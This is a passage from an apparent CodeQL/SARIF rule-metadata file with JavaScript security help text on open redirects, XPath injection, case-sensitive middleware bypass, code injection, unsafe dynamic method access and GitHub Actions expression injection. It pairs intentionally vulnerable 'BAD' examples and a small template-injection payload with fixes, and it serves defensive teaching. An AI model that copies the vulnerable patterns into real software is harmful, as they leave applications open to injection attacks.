Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above 
code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", - "markdown" : "# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n // BAD: a request parameter is incorporated without validation into a URL redirect\n res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: the request parameter is 
validated against a known fixed string\n let target = req.query[\"target\"];\n if (VALID_REDIRECT === target) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n try {\n return (\n // TODO: consider substituting your own domain for example.com\n new URL(path, \"https://example.com\").origin === \"https://example.com\"\n );\n } catch (e) {\n return false;\n }\n}\n\napp.get(\"/redirect\", function (req, res) {\n // GOOD: check that we don't redirect to a different host\n let target = req.query[\"target\"];\n if (isLocalUrl(target)) {\n res.redirect(target);\n } else {\n res.redirect(\"/\");\n }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. 
You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-601" ], - "description" : "Server-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", - "id" : "js/server-side-unvalidated-url-redirection", - "kind" : "path-problem", - "name" : "Server-side URL redirect", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "6.1" - } - }, { - "id" : "js/client-side-unvalidated-url-redirection", - "name" : "js/client-side-unvalidated-url-redirection", - "shortDescription" : { - "text" : "Client-side URL redirect" - }, - "fullDescription" : { - "text" : "Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. 
Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n", - "markdown" : "# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. 
This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116", "external/cwe/cwe-601" ], - "description" : "Client-side URL redirection based on unvalidated user input\n may cause redirection to malicious web sites.", - "id" : "js/client-side-unvalidated-url-redirection", - "kind" : "path-problem", - "name" : "Client-side URL redirect", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/xpath-injection", - "name" : "js/xpath-injection", - "shortDescription" : { - "text" : "XPath injection" - }, - "fullDescription" : { - "text" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of malicious code by the user." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath 
Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n", - "markdown" : "# XPath injection\nIf an XPath expression is built using string concatenation, and the components of the concatenation include user input, it makes it very easy for a user to create a malicious XPath expression.\n\n\n## Recommendation\nIf user input must be included in an XPath expression, either sanitize the data or use variable references to safely embed it without altering the structure of the expression.\n\n\n## Example\nIn this example, the code accepts a user name specified by the user, and uses this unvalidated and unsanitized value in an XPath expression constructed using the `xpath` package. 
This is vulnerable to the user providing special characters or string sequences that change the meaning of the XPath expression to search for different values.\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // BAD: Use user-provided data directly in an XPath expression\n let badXPathExpr = xpath.parse(\"//users/user[login/text()='\" + userName + \"']/home_dir/text()\");\n badXPathExpr.select({\n node: root\n });\n});\n\n```\nInstead, embed the user input using the variable replacement mechanism offered by `xpath`:\n\n\n```javascript\nconst express = require('express');\nconst xpath = require('xpath');\nconst app = express();\n\napp.get('/some/route', function(req, res) {\n let userName = req.param(\"userName\");\n\n // GOOD: Embed user-provided data using variables\n let goodXPathExpr = xpath.parse(\"//users/user[login/text()=$userName]/home_dir/text()\");\n goodXPathExpr.select({\n node: root,\n variables: { userName: userName }\n });\n});\n\n```\n\n## References\n* OWASP: [Testing for XPath Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection).\n* OWASP: [XPath Injection](https://www.owasp.org/index.php/XPATH_Injection).\n* npm: [xpath](https://www.npmjs.com/package/xpath).\n* Common Weakness Enumeration: [CWE-643](https://cwe.mitre.org/data/definitions/643.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-643" ], - "description" : "Building an XPath expression from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/xpath-injection", - "kind" : "path-problem", - "name" : "XPath injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : 
"js/case-sensitive-middleware-path", - "name" : "js/case-sensitive-middleware-path", - "shortDescription" : { - "text" : "Case-sensitive middleware path" - }, - "fullDescription" : { - "text" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n", - "markdown" : "# Case-sensitive middleware path\nUsing a case-sensitive regular expression path in a middleware route enables an attacker to bypass that middleware when accessing an endpoint with a case-insensitive path. Paths specified using a string are case-insensitive, whereas regular expressions are case-sensitive by default.\n\n\n## Recommendation\nWhen using a regular expression as a middleware path, make sure the regular expression is case-insensitive by adding the `i` flag.\n\n\n## Example\nThe following example restricts access to paths in the `/admin` path to users logged in as administrators:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\nA path such as `/admin/users/45` can only be accessed by an administrator. 
However, the path `/ADMIN/USERS/45` can be accessed by anyone because the upper-case path doesn't match the case-sensitive regular expression, whereas Express considers it to match the path string `/admin/users`.\n\nThe issue can be fixed by adding the `i` flag to the regular expression:\n\n\n```javascript\nconst app = require('express')();\n\napp.use(/\\/admin\\/.*/i, (req, res, next) => {\n if (!req.user.isAdmin) {\n res.status(401).send('Unauthorized');\n } else {\n next();\n }\n});\n\napp.get('/admin/users/:id', (req, res) => {\n res.send(app.database.users[req.params.id]);\n});\n\n```\n\n## References\n* MDN [Regular Expression Flags](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions#advanced_searching_with_flags).\n* Common Weakness Enumeration: [CWE-178](https://cwe.mitre.org/data/definitions/178.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-178" ], - "description" : "Middleware with case-sensitive paths do not protect endpoints with case-insensitive paths.", - "id" : "js/case-sensitive-middleware-path", - "kind" : "problem", - "name" : "Case-sensitive middleware path", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.3" - } - }, { - "id" : "js/code-injection", - "name" : "js/code-injection", - "shortDescription" : { - "text" : "Code injection" - }, - "fullDescription" : { - "text" : "Interpreting unsanitized user input as code allows a malicious user arbitrary code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. 
Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Code injection\nDirectly evaluating user input (for example, an HTTP request parameter) as code without properly sanitizing the input first allows an attacker arbitrary code execution. This can occur when user input is treated as JavaScript, or passed to a framework which interprets it as an expression to be evaluated. Examples include AngularJS expressions or JQuery selectors.\n\n\n## Recommendation\nAvoid including user input in any expression which may be dynamically evaluated. If user input must be included, use context-specific escaping before including it. 
It is important that the correct escaping is used for the type of evaluation that will occur.\n\n\n## Example\nThe following example shows part of the page URL being evaluated as JavaScript code. This allows an attacker to provide JavaScript within the URL. If an attacker can persuade a user to click on a link to such a URL, the attacker can evaluate arbitrary JavaScript in the browser of the user to, for example, steal cookies containing session information.\n\n\n```javascript\neval(document.location.href.substring(document.location.href.indexOf(\"default=\")+8))\n\n```\nThe following example shows a Pug template being constructed from user input, allowing attackers to run arbitrary code via a payload such as `#{global.process.exit(1)}`.\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello `+ input\n var fn = pug.compile(template);\n var html = fn();\n res.send(html);\n})\n\n```\nBelow is an example of how to use a template engine without any risk of template injection. 
The user input is included via an interpolation expression `#{username}` whose value is provided as an option to the template, instead of being part of the template string itself:\n\n\n```javascript\nconst express = require('express')\nvar pug = require('pug');\nconst app = express()\n\napp.post('/', (req, res) => {\n var input = req.query.username;\n var template = `\ndoctype\nhtml\nhead\n title= 'Hello world'\nbody\n form(action='/' method='post')\n input#name.form-control(type='text)\n button.btn.btn-primary(type='submit') Submit\n p Hello #{username}`\n var fn = pug.compile(template);\n var html = fn({username: input});\n res.send(html);\n})\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Wikipedia: [Code Injection](https://en.wikipedia.org/wiki/Code_injection).\n* PortSwigger Research Blog: [Server-Side Template Injection](https://portswigger.net/research/server-side-template-injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-95](https://cwe.mitre.org/data/definitions/95.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-095", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Interpreting unsanitized user input as code allows a malicious user arbitrary\n code execution.", - "id" : "js/code-injection", - "kind" : "path-problem", - "name" : "Code injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/unsafe-dynamic-method-access", - "name" : "js/unsafe-dynamic-method-access", - "shortDescription" : { - "text" : "Unsafe dynamic method access" - }, - "fullDescription" : { - "text" : "Invoking user-controlled 
methods on certain objects can lead to remote code execution." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. 
It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Unsafe dynamic method access\nCalling a user-controlled method on certain objects can lead to invocation of unsafe functions, such as `eval` or the `Function` constructor. In particular, the global object contains the `eval` function, and any function object contains the `Function` constructor in its `constructor` property.\n\n\n## Recommendation\nAvoid invoking user-controlled methods on the global object or on any function object. Whitelist the permitted method names or change the type of object the methods are stored on.\n\n\n## Example\nIn the following example, a message from the document's parent frame can invoke the `play` or `pause` method. However, it can also invoke `eval`. 
A malicious website could embed the page in an iframe and execute arbitrary code by sending a message with the name `eval`.\n\n\n```javascript\n// API methods\nfunction play(data) {\n // ...\n}\nfunction pause(data) {\n // ...\n}\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function \n window[message.name](message.payload);\n});\n\n```\nInstead of storing the API methods in the global scope, put them in an API object or Map. It is also good practice to prevent invocation of inherited methods like `toString` and `valueOf`.\n\n\n```javascript\n// API methods\nlet api = {\n play: function(data) {\n // ...\n },\n pause: function(data) {\n // ...\n }\n};\n\nwindow.addEventListener(\"message\", (ev) => {\n let message = JSON.parse(ev.data);\n\n // Let the parent frame call the 'play' or 'pause' function\n if (!api.hasOwnProperty(message.name)) {\n return;\n }\n api[message.name](message.payload);\n});\n\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* MDN: [Global functions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects#Function_properties).\n* MDN: [Function constructor](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094" ], - "description" : "Invoking user-controlled methods on certain objects can lead to remote code execution.", - "id" : "js/unsafe-dynamic-method-access", - "kind" : "path-problem", - "name" : "Unsafe dynamic method access", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.3" - } - }, { - "id" : "js/actions/command-injection", - "name" : "js/actions/command-injection", - "shortDescription" : { - "text" : "Expression injection in Actions" 
- }, - "fullDescription" : { - "text" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious user to inject code into the GitHub action." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab 
Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n", - "markdown" : "# Expression injection in Actions\nUsing user-controlled input in GitHub Actions may lead to code injection in contexts like *run:* or *script:*.\n\nCode injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository.\n\n\n## Recommendation\nThe best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not *${{ env.VAR }}*).\n\nIt is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN.\n\n\n## Example\nThe following example lets a user inject an arbitrary shell command:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - run: |\n echo '${{ github.event.comment.body }}'\n```\nThe following example uses an environment variable, but **still allows the injection** because of the use of expression syntax:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo '${{ env.BODY }}'\n```\nThe following 
example uses shell syntax to read the environment variable and will prevent the attack:\n\n\n```yaml\non: issue_comment\n\njobs:\n echo-body:\n runs-on: ubuntu-latest\n steps:\n - env:\n BODY: ${{ github.event.issue.body }}\n run: |\n echo \"$BODY\"\n\n```\n\n## References\n* GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input).\n* GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions).\n* GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n" - }, - "properties" : { - "tags" : [ "actions", "security", "external/cwe/cwe-094" ], - "description" : "Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious\n user to inject code into the GitHub action.", - "id" : "js/actions/command-injection", - "kind" : "problem", - "name" : "Expression injection in Actions", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.3" - } - }, { - "id" : "js/bad-code-sanitization", - "name" : "js/bad-code-sanitization", - "shortDescription" : { - "text" : "Improper code sanitization" - }, - "fullDescription" : { - "text" : "Escaping code as HTML does not provide protection against code injection." 
